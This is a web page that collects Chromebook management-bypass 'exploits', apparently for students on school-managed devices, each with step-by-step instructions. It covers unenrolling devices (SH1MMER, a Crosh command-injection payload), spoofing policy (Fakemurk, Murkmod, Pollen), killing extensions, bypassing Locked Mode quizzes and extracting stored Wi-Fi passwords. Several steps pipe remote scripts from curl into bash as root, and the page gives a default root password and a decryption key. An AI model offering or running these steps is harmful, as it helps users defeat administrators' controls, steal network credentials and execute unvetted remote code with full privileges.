Both devices should be on the same Wi-Fi network.
DO NOT USE PUBLIC ICARUS PROXIES.
Chrome OS-based exploit.

IcarusLite.mp4

1: On an external PC, clone the repo with "git clone --recursive https://github.com/cosmicdevv/Icarus-Lite.git" & change directory to it (cd Icarus-Lite).
2: Set up the environment. You can either run the following commands or the exe.

Install dependencies: "pip install -r requirements.txt"/"pip3 install -r requirements.txt"/"sudo apt install python3-protobuf python3-requests python3-openssl python3-cryptography"
Run server: run python main.py/python3 main.py

Nonkeyrolled A: Check your Chromebook's board in chrome://version, then download a prebuilt SH1MMER bin (with the Icarus payload) here.
B: Flash it to an external storage device, enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked), then boot the shim.

Keyrolled A: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
B: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
C: When connected, press Ctrl+Alt+F3 & run "bash <(curl -SLk http://ba.cosmion.xyz/script)".

3: Reboot into Verified Mode & do not click continue. Open up the Network Configuration instead (bottom right corner).
4: Set the connection type to "Manual" & the "Secure HTTP" options to those given earlier, then click "Save" & continue the setup process.

back to top


Any OS RecoveryMode Kernel Version Switcher

Only works on unenrolled Chromebooks; requires a storage device
Switches your kernver.
Chrome OS-based exploit.

KVS.mp4

1: Unenroll your Chromebook.
3: Download a KVS bin from here.
4: Flash it onto a storage device.
5: Enter Dev Mode.
6: Reenter Recovery Mode.
7: Follow the instructions on-screen.

back to top


Any Web Locked Mode X

Very buggy
Bypasses Google's Locked Mode.
Web-based exploit.


1: Open the locked form twice.
2: Click "Continue" on both at the exact same time. Using touchscreen will help a lot.
3: Click the Overview button (not Alt+Tab, that closes the quiz) on your keyboard.

Note you can't screenshot until the form has been submitted.

back to top


vAny OS DevMode Murkmod

Requires Dev Mode
Spoofs Secure Mode with Dev Mode privileges. Continuation of Fakemurk.
OS-based exploit.


1: Enter Dev Mode (Esc+Power+Refresh; Ctrl+D) & the VT2 shell (Ctrl+Alt+F2).
2: Logn as root & run "bash <(curl -SLk https://bit.ly/murkmod)".
3: Install the helper extension (unzip the "helper" folder & load unpacked).

For more installation methods, see here.

back to top


vAny OS chrome://flags NCOCrOS

Requires chrome://flags
Allows you to update your web browser separate from Chrome OS.
OS-based exploit.


1: Go to chrome://flags#lacros & enable it.
2: Restart your Chromebook.

back to top


Any OS Powerwash Revertion

Requires powerwash
Reverts Chrome OS back to its previous version.
Chrome OS-based exploit.


1: Powerwash your Chromebook.
2: On the OOBE screen, press Ctrl+Shift+Alt+R twice.
3: Click "Powerwash & Revert".

back to top


Any Web Search Filter Bypass

doesn't do shit
Works around the set blocked pages.
Web-based "exploit".


1: Type what you want to search in the address bar & add enough bullshit, then press enter.

back to top


Any OS;Unenrollment ExternalStorageDevice SH1MMER p class="small-text">Requires a storage device; patched on kernver 4+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.

SH1MMER.mp4

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4 or more, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web, download an injected bin from here, or build one yourself.
Modern shims have a UI, while Legacy uses a commandline interface.
5: Flash the injected bin onto an external storage device.
6: Enter Recovery Mode (Esc+Refresh+Power when booting), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: On Legacy shims, play some Tetris. This is legally required.
9: Use the Cryptosmite payload, this is "S" on Legacy. The decryption key is "Info-58-immense!NickName_Arabia-710" on older Legacy shims.
10: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

Reenrollment 1: Enter Dev Mode, then press Esc+Power+Reload then Ctrl+D & then enter.
2: If you get a screen that says "You're already in Dev Mode", skip it by pressing Ctrl+D again.
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R). If you just entered Dev Mode, you can skip this step.
4: Once you enter the Wi-Fi password, click the "Enterprise Enrollment" button & sign in with your school account.
5: Once you're on the normal district login screen, press Ctrl+Alt+F2.
6: Type "root" as the login & "test0000" as the password if needed.
7: Run the command "vpd -i RW_VPD -s check_enrollment=0", then press Ctrl+Alt+F1.
8: Once you're done, reboot your computer with Power+Refresh, then reunenroll.

back to top


Any OS DevMode;ExternalStorageDevice Shimboot

Requires a storage device, Dev Mode; patched on keyrolled devices
Allows you to boot Linux or Chrome OS from an external storage device without modifying your Chromebook.
Chrome OS-based exploit.

Shimboot.mp4

1: Find your Chromebook’s board name by going to chrome://version, it will be behind “stable-channel”.
2: Get your Chromebook’s RMA shim from chrome100.dev & run the commands below or download a prebuilt one from here.

A: Clone this repository.

B: Run "mkdir -p data/rootfs", "sudo ./build_rootfs.sh data/rootfs bookworm", "sudo ./patch_rootfs.sh path_to_shim path_to_reco data/rootfs", & "sudo ./build.sh image.bin path_to_shim data/rootfs".

3: Flash it onto an external storage device.
4: Enable Dev Mode & then plug in the storage device & reenter Recovery Mode (Esc+Refresh+Power).
5: Boot into Linux & log in. The default is user/user.
6: Expand the rootfs partition so that it fills up the entire disk by running "sudo growpart /dev/sdX 4" (replacing sdX with the block device corresponding to your disk) to expand the partition, then run "sudo resize2fs /dev/sdX4" to expand the filesystem.

back to top


Any Web ExtensionCodeExecution;chrome://flags Sh0vel

Requires code execution in extensions, chrome://flags access
Unblocks bookmarklets.
Web-based exploit.


1: Get code execution in an extension. This extension will need to have the "tabs", "activeTab", & "browserAction" permissions as well as 'unsafe-eval' set in the CSP.
2: Enable the flag "#extensions-on-chrome-urls".
3: Get a bookmarklet & place it as follows: chrome.browserAction.onClicked.addListener(() => {chrome.tabs.executeScript(null, {code: `location.href="javascript:bookmarklet";`});});
4: Open the URL you want this code to run on & click the extension icon.

back to top


Any Web DevMode;ExtensionDevMode Skebstore

Requires extension Developer Mode
An extension that allows you to download other extensions.
Web-based exploit.

Skebstore.mp4

1: Download the folder from the GitHub page or here.
2: Go to chrome://extensions & enable extension Developer Mode.
3: Click "Load unpacked" & select the folder (unzip it if needed).
4: Click the extension to go to the Skebstore install page.
5: Insert an extension's ID & download it.

back to top


Any Web Snap&Read Snap&Run

Snap&Read exclusive
Unblocks bookmarklets.
Web-based exploit.


1: Sign in to an active account.

Setup:

2: Enable the Snap&Read toolbar.
3: Enter any text into the outline topic's editable text area.
4: Click the bullet point of the topic.
5: Click the "Link to Source" option.
6: Click the "+" button at the bottom right.
7: Switch to the website tab.
8: In the Article/Page title input field, enter the name of your chosen bookmarklet.

-Be sure to add this bookmarklet executor.

9: Click "Save" & switch to the outline tab.
10: In the Snap&Read toolbar, click the "Hide Outlines" button.

Execution:

11: In the Snap&Read toolbar, click the "Show Outlines" button.
12: In your created outline, click the link separated by parenthesis that contains the bookmarklet.
13: Click the "Hide Outlines" button.

back to top


Any Web SourceCode Source View

Requires the ability to view a page’s source code
Reconstructs a web page from its source code.
Web-based "exploit".


1: Go to a website & view its source code with Ctrl+U or by using the View Source bookmarklet.
2: Copy everything from the newly opened tab & paste it in a site like this.

back to top


Any Web Sync Internals Password Extractor

Requires a CAUB'd Wi-Fi network
Find the Wi-Fi password for CAUB'd Wi-Fi networks.
Web-based exploit.

SIPE.mp4

1: CAUB the Wi-Fi network you want to get the password from.
2: Go here & type the name of the Wi-Fi network.
3: Click the majik (TM) button, it will tell you what you'll need to press in step 6.
4: Go to chrome://sync-internals/ in a new tab & click the "Search" tab.
5: Type "Wi-Fi_" in the textbox & click "Search".
6: Click the name of the Wi-Fi you got from step 3 & copy all the data. Note that it might be a longer string than what it says on SIPE.
7: Go back to SIPE & paste the data in the textbox, then click the majik button (TM).

back to top


Any Web Crosh;ExtensionDevMode Tr3nch

Requires Sh0vel, Extension Dev Mode, Crosh; patched on Chrome OS 127+
Run scripts in Chrome pages.
Web-based exploit.


1: Enter a kiosk profile with SKIOVOX.
2: Download the ZIP from here.
3: Navigate to chrome://extensions & enable Extension Dev Mode, then load the extension.
4: Navigate to chrome-untrusted://crosh & run "vmc create-extra-disk --size=1 /home/chronos/user/MyFiles/Downloads/opener.txt". It should return "A raw disk is created at /home/chronos/user/MyFiles/Downloads/opener.txt."
5: Open a new tab. If the default New Tab page loads, install the SKIOVOX Helper extension in a new tab before proceeding.
6: Click the folder icon in the bottom right. The file manager should open. Navigate to "Downloads".
7: Open the opener.txt file. A new window should open with a blank page tab. This window is managed by your organization.
8: Open a new tab & close the blank page tab.
9: Navigate to chrome://extensions & open the details page of the extension you previously chose to install in your managed profile. Copy its extension ID.
10: Return to the regular window that is not managed by your organization.
11: Activate the Skiovox Breakout extension.
12: In the input field for the extension ID, enter the ID of the extension you previously chose to install in your managed profile.
13: Set the textarea text to the script you want to run.
14: Click Start injection.

Loading the Tr3nch Menu:

1: Navigate to chrome://flags & enable the "extensions-on-chrome-urls" flag.
2: Click "Restart" then navigate to chrome://os-settings, chrome://setttings, chrome://extensions, chrome://chrome-signin, chrome://inspect, chrome://file-manager, chrome://network, or chrome://oobe.
3: Click the extensions extension icon in the toolbar.
4: Click & activate the extension with the injected script. The Tr3nch menu should launch.

back to top


Any Web uBlockOrigin uBlock Run

uBlock Origin exclusive
Unblocks bookmarklets. Older version of uRun.
Web-based exploit.


1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it from "unset" to "https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js".
3: Go to the “My filters” tab & add a line with “*##+js(execute_script.js)”, then run the code on the current page (Ctrl+Alt+~).

The only reason to use this is for Securely-Kill.

back to top


Any OS DevMode;ExternalStorageDevice USBoot

Requires Dev Mode, external storage device
Allows you to boot from an external storage device. See Shimboot for booting Linux from an external storage device

USBoot.mp4

1: Enable Dev Mode (Esc+Power+Refresh).
2: After selecting "boot from internal disk", press Ctrl+Alt+F2.
3: Type "sudo crossystem dev_boot_usb=1". Note that if the GBB flag that ignores this is set you can skip this step.

Press "Ctrl+U" on the OS Verification screen to boot from USB.

back to top


Any Web uBlockOrigin uRun

uBlock Origin exclusive
Unblocks bookmarklets. Updated version of uBlock Run.
Web-based exploit.

uRun.mp4

1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it to "https://inglan2.github.io/uRun/urun.js".
3: Go to the “My filters” tab & add a line with “*##+js(urun.js)”, then run the code on the current page (Ctrl+Alt+~).

Press "Ctrl+Shift+`" to open the menu, where you can run & create scripts. To add a script, click the ➕ button & enter the code without the "javascript:" part.

back to top


Any Web chrome://net-export;chrome://network;chrome://policy Policy Password Tool

Only works with connected networks; Chrome OS exclusive
Gives the passwords to connected Wi-Fi networks from a .json file.
Web-based exploit.

PPT.mp4

1: Go to chrome://net-export.
2: Select "Include raw bytes" & start logging to disk.
3: Go to chrome://policy.
4: Click "Reload policies".
5: Go back to chrome://net-export & stop logging.
6: Go here or open this HTML file & upload the log file.

back to top


Any Priism

N/A
Recovery image/shim manager.
Chrome OS-based tool.


1: Build or download a prebuilt image, then flash & boot it.
It is recommended to use Priishimbooter for Shimboot.

back to top



Crosh

Any Crosh;DevMode CroshFi

Requires Dev Mode
Gives you the password to a Wi-Fi network.


1: Enter Dev Mode & open Crosh (Ctrl+Alt+T).
2: Run the commands "shell", "sudo su", & "cd home/root", then type "ls" & copy the middle code string.
3: Run the command "cd [code string here]" & type "ls" again. Enter "more shill/shill.profile".
4: Enter "more shill/shill.profile".
5: Eventually, you’ll see a username appear. Scroll up in Crosh until you see the SSID (network ID). Copy the passphrase code (below the SSID & after the colon).
6: Run the command "echo [passphrase] | tr ‘!-~’ ‘P-~!-O’."

back to top


100 Crosh De-roll

Patched on Chrome OS 101+
Unenrolls your Chromebook using Crosh.


Unenroll:
1: Open Crosh (Ctrl+Alt+T).
2: Run "set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'"
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R).
4: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

Re-enroll:
1: Open a bash shell & run "sudo -i", "vpd -i RW_VPD -s check_enrollment=1", "echo "fast safe" > /mnt/stateful_partition/factory_install_reset", & "reboot".

back to top


116 Crosh;DevMode;RecoveryMode Fakemurk

Requires Dev Mode; patched on version 117+
Allows you to have Dev Mode permissions while in Safe Mode. Succeeded by Murkmod


1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
4: Enter Dev Mode.
5: Go to chrome-untrusted://crosh & run the commands "shell", “sudo -i”, & “bash <(curl -SLk https://github.com/MercuryWorkshop/fakemurk/releases/latest/download/fakemurk.sh)”. Follow everything it says. If you get an error about a filesystem being readonly, run “fsck -f $(rootdev)” & reboot.

If you get stuck on the enrollment screen, enter Dev Mode with Ctrl+D, then press Refresh+Power & then space on the OS Verification screen. You will be on a “Chrome OS is missing or damaged” screen. Enter Dev Mode & when you get back to the OS verification screen press Ctrl+D to boot.

Don't use the sign out button as it will freeze your computer. Use Power+Refresh or Reboot in Crosh instead.
Mush will be installed with Fakemurk.
While Fakemurk is installed, you can make a folder called “disable-extensions” to disable extensions.

back to top


Any Crosh K1LL3R SP1D3R

Requires Chronos access
Kills all extensions.


1: Run "while true; do kill -9 $(pgrep -f "\-\-extension\-process"); done".

back to top


Any Crosh;Powerwash OP Crosh

Requires powerwash
Deletes the extensions.


1: Open Crosh (Ctrl+Alt+T) & run the “vmc” command. If you get a list of subcommands, then continue.
2: Powerwash then sign in & disable Wi-Fi immediately.
3: Go to chrome://extensions & enable your internet, then immediately disable it when an extension is installed.
4: Open Crosh & for each extension you want to disable, run the command “vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extensionID}” or run "Open Crosh & type “vmc create-extra-disk --size 1 /home/chronos/user/Extensions”" to disable all.
5: Reenable Wi-Fi.

back to top


130 Crosh;DevMode Pollen

Requires Dev Mode; patched on Chrome OS 131+
Changes your Chromebook's policy.
Chrome OS-based exploit.


1: Enter Dev Mode (Esc+Power+Refresh) & open Crosh (Ctrl+Alt+T).
2: Run the following commands: “shell”, “sudo su”, & “curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash”.

A: If the policy doesn’t apply, press Alt+Vol Up+X.

3: Reboot, repeat steps 1 & 2, then run this command: "curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash".

back to top


Created by The Wagonization, consisting of JackWagon885
All credit goes to the respective owners. I only compile them in a list.
Fuck you Google